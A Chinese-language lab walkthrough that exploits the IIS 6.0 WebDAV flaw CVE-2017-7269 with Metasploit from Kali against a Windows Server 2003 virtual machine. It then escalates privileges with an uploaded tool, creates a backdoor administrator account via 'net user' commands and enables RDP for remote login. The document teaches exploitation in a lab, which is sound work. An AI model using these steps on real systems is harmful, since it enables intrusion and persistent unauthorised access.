iis6.0远程代码执行漏洞
1、实验环境搭建
目标主机Windows server2003 sp2
2、目标服务器需要在IIS里面开启WebDAV
3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址)
Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址)
4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下:
注:exp为资源包,可自行下载,稍后上传到csdn
https://download.csdn.net/download/G208_522/46134521
kali中启动Msfconsole,使用CVE-2017-7269攻击插件
输入:msfconsole启动metasploit
5、然后reload_all****重启****加载exp。
6、use exploit/windows/iis/cve_2017_7269。
7、使用show options查看相关参数。
8、设置目标主机,http主机,以及返回载荷。
9、设置完成,exploit
10、输入shell查看目前接入权限
11、进入C盘
12、使用md命令创建123文件夹
使用dir命令查看,以及存在123文件夹
13、使用IIS6.exe提权
输入exit退出至msf命令模式下
使用upload命令上传IIS6.exe以及3389.bat文件至win2003 C盘下123文件夹。
14、输入shell进入2003系统,使用提权工具,查看当前权限。
创建用户
IIS6.0.exe “net user zhangsan 123456 /add”
把张三加入到管理员组
IIS6.0.exe “net localgroup Administrators zhangsan /add”
查看系统是否开启3389端口。
使用iis6.exe 执行上传的3389.bat文件。
3389端口已经打开。
我们使用zhangsan用户进行远程连接。
打开win10下远程桌面(快捷命令为mstsc)